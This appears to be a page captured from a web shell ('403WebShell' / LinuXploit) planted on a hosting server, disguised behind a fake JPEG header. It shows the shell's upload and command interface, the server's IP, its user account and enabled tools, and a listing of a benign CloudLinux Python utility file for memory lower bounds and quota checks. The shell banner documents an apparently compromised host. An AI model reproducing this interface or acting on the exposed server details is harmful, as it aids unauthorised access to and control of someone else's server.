ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.221
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib//utils.py
# coding:utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import json
import os
import sys
import time
from typing import Optional

from clcommon.utils import run_command, ExternalProgramFailed
from clcommon.clfunc import memory_to_page, page_to_memory
from clcommon.clexception import FormattedException

VALUES_STR = 'Available values for option'
_LIMITS_LOWER_BOUNDS_CONFIG_FILE = '/etc/sysconfig/limits_lower_bounds'

class LowerBoundsConfigException(FormattedException):
    pass

def _read_lower_bounds_config() -> dict:
    """
    Read all lower bounds from config file
    Returns dict with lower bound names as keys and values as strings
    :raises LowerBoundsConfigException: If file exists but cannot be read
    """
    # If file doesn't exist return empty dict
    if not os.path.exists(_LIMITS_LOWER_BOUNDS_CONFIG_FILE):
        return {}

    lower_bounds = {}
    try:
        with open(_LIMITS_LOWER_BOUNDS_CONFIG_FILE, 'r', encoding='utf-8') as f:
            for line in f:
                line = line.strip()
                if line and '=' in line and not line.startswith('#'):
                    key, value = line.split('=', 1)
                    lower_bounds[key.strip()] = value.strip()
    except (OSError, IOError) as e:
        raise LowerBoundsConfigException({
            'message': "Failed to read limits' lower bounds configuration from %(file)s. "
                       "The file may be corrupted. Error: %(error)s",
            'context': {
                'file': _LIMITS_LOWER_BOUNDS_CONFIG_FILE,
                'error': str(e)
            }
        }) from e
    return lower_bounds


def _write_lower_bounds_config(lower_bounds: dict) -> bool:
    """
    Write lower bounds to config file
    """
    try:
        os.makedirs(os.path.dirname(_LIMITS_LOWER_BOUNDS_CONFIG_FILE), exist_ok=True)
        with open(_LIMITS_LOWER_BOUNDS_CONFIG_FILE, 'w', encoding='utf-8') as f:
            f.write('# CloudLinux lower bounds configuration\n')
            f.write('# Format: RESOURCE_TYPE=value\n\n')
            for key, value in sorted(lower_bounds.items()):
                f.write(f'{key}={value}\n')
        return True
    except (OSError, IOError):
        return False


def read_lower_bound(resource_type: str) -> Optional[int]:
    """
    Read lower bound for any resource type from config file
    Returns lower bound in pages or None if not set

    :param resource_type: Type of resource (e.g., 'PMEM', 'VMEM')
    :raises LowerBoundsConfigException: If config file is corrupted
    """
    lower_bounds = _read_lower_bounds_config()
    limit_str = lower_bounds.get(resource_type.upper())
    if limit_str:
        return memory_to_page(limit_str)
    return None


def write_lower_bound(resource_type: str, bound_value: str) -> bool:
    """
    Write lower bound for any resource type to config file

    :param resource_type: Type of resource (e.g., 'PMEM', 'VMEM')
    :param bound_value: Lower bound value as string (e.g., '512M', '1G')
    :raises LowerBoundsConfigException: If config file is corrupted
    """
    lower_bounds = _read_lower_bounds_config()
    lower_bounds[resource_type.upper()] = bound_value
    return _write_lower_bounds_config(lower_bounds)


def check_pmem_lower_bound(pmem_pages: int) -> Optional[dict]:
    """
    Check if PMEM value is below configured lower bound and return error
    :param pmem_pages: PMEM value in pages
    :return: Error dict with 'message' and 'context' or None
    """
    try:
        lower_bound_pages = read_lower_bound('PMEM')
    except LowerBoundsConfigException as e:
        return {'message': e.message, 'context': e.context}

    if lower_bound_pages is not None and pmem_pages != 0 and pmem_pages < lower_bound_pages:
        lower_bound = page_to_memory(lower_bound_pages)

        return {
            'message': (
                'PMEM limit is below configured lower bound of %(bound)s. '
                'This may cause application instability and performance issues.'
            ),
            'context': {'bound': lower_bound}
        }
    return None


def check_pmem_lower_bound_from_string(pmem_value: str) -> Optional[dict]:
    """
    Check if PMEM value (as string) is below configured lower bound and return error
    :param pmem_value: PMEM value as string (e.g., "5m", "512M", etc.)
    :return: Error dict with 'message' and 'context' or None
    """
    pmem_pages = memory_to_page(pmem_value)
    if pmem_pages is not None:
        return check_pmem_lower_bound(pmem_pages)
    return None


def replace_params(data):
    """
    Replacing params in data for show error message
    :param data: error's data for show message
    :return:
    """
    if data.startswith("--"):
        param, text = data.split(" ", 1)
        return {"result": "%(param)s " + text, "context": {"param": param}}

    if data.startswith(VALUES_STR):
        text, param = data.split(":", 1)
        return {"result": text + ": %(available_options)s",
                "context": {"available_options": param.strip()}}

    return {"result": data}


def _is_string_number(s_val):
    """
    Checks is string contains a number (integer or float)
    :param s_val: String to check
    :return: True - string is number, False - not number
    """
    try:
        float(s_val)
        return True
    except ValueError:
        return False


def convert_mem_value_to_bytes(value):
    """
    Convert value in Gbytes,Mbytes to bytes

    :param value: value of mem limit
    :return: value in bytes
    """
    value = str(value).lower()
    if value.endswith('k'):
        power = 1
    elif value.endswith('m'):
        power = 2
    elif value.endswith('g'):
        power = 3
    elif _is_string_number(value):
        power = 1
        value = f'{value}k'
    else:
        raise ValueError('Wrong memory value')
    return int(1024 ** power * float(value[:-1]))


def _convert_memory_value_to_adaptive_format(value, convert=True):
    """
    Convert memory value to adaptive value in GB, TB, etc

    :param value: memory value in MB or KB
    :param convert: if True - convert value, False - not convert
    :return: adaptive value in GB, TB, etc

    """

    if not convert:
        return value

    value = str(value).lower()

    units = ['K', 'M', 'G', 'T', 'P']
    if value.endswith('m'):
        del units[0]
    value = str(value).lower().replace('m', '').replace('k', '')  # remove unit symbol

    if value.startswith('*'):
        result = '*'
        value = value.replace('*', '')
    else:
        result = ''
    value = float(value)
    for unit in units:
        if value // 1024 > 0:
            value /= 1024
        elif value == 0:
            result = f'{result}0K'
            break
        else:
            result = f'{result}{value:.2f}{unit}'
            break

    return result


def print_dictionary(data_dict, is_json=False):
    """
    Print specified dictionary
    :param data_dict: data dictionary to print
    :param is_json: True - print in JSON, False - in text
    :return: None
    """
    # Print as JSON
    # print json.dumps(data_dict, indent=2, sort_keys=True)
    if is_json:
        # Print as JSON
        print(json.dumps(data_dict, sort_keys=True))
    else:
        # Print as text
        print(data_dict)


def print_error_and_exit(message, is_json=False):
    """
    Prints to stdout
    :param: is_json - True if print error in json format, False - text
    """
    data = {"timestamp": time.time(), "result": str(message)}
    print_dictionary(data, is_json)
    sys.exit(1)


def is_quota_supported(cl_quota_path, repquota_path):
    """
    Detect quota is supported
    :return: True/False - quotas supported/not supported
    """
    # Check if all needed utilities present
    if not os.path.isfile(cl_quota_path) or not os.path.isfile(repquota_path):
        return False
    return True


def is_quota_active(cl_quota_path, repquota_path):
    """
    Detect quota is activated
    :return: True/False - quotas activated/not activated
    """
    # If quotas not supported they are not activated
    if not is_quota_supported(cl_quota_path, repquota_path):
        return False
    # Check is quota activated
    cmd = [repquota_path, '-nva']
    try:
        stdout = run_command(cmd)
    except ExternalProgramFailed:
        return False
    # quotas not supported if repqouta returns nothing
    if not stdout:
        return False
    return True

Youez - 2016 - github.com/yon3zu
LinuXploit